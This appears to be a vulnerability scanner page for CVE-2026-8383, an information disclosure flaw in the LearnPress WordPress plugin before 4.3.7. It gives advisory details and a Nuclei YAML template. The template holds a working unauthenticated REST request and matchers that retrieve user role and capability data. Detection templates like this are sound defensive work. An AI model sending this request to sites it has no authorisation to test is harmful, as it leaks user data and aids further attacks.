LearnPress < 4.3.7 - Information Disclosure
CVE-2026-8383
Early Release
Description
LearnPress WordPress plugin < 4.3.7 contains an information disclosure vulnerability caused by missing capability checks on a REST endpoint, letting unauthenticated visitors retrieve sensitive user role and capability data via crafted requests.
Severity: Medium
CVSS Score: 5.3
Exploit Probability: 0%
Affected Product: learnpress
Published Date: June 25, 2026
Template Author: 0x_akoko
CVE-2026-8383.yaml
id: CVE-2026-8383

info:
  name: LearnPress < 4.3.7 - Information Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
    LearnPress WordPress plugin < 4.3.7 contains an information disclosure vulnerability caused by missing capability checks on a REST endpoint, letting unauthenticated visitors retrieve sensitive user role and capability data via crafted requests.
  impact: |
    Unauthenticated attackers can access sensitive user role and capability information, potentially aiding further attacks.
  remediation: |
    Update to version 4.3.7 or later.
  reference:
    - https://wpscan.com/vulnerability/b7cbf68b-62c5-4787-b84b-69df9e0122b2/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-8383
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-8383
    epss-score: 0.00187
    epss-percentile: 0.085
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    fofa-query: body="/wp-content/plugins/learnpress/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,learnpress,disclosure,rest-api

http:
  - raw:
      - |
        GET /wp-json/learnpress/v1/users?context=edit HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"roles\"", "\"capabilities\"", "registered_date")'
        condition: and
# digest: 4a0a00473045022100ae18529637091c71eeff6e38f7f9086f5bc9b985fb6d29146271c3d1b9cff1ca0220636726a09bc9cab08d4b385429a49423dc359096b26f15ee28c593e70344599d:922c64590222798bb761d5b6d8e72950

5.3 Score
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID: CVE-2026-8383
CWE ID: CWE-862
Remediation Steps
Update to version 4.3.7 or later.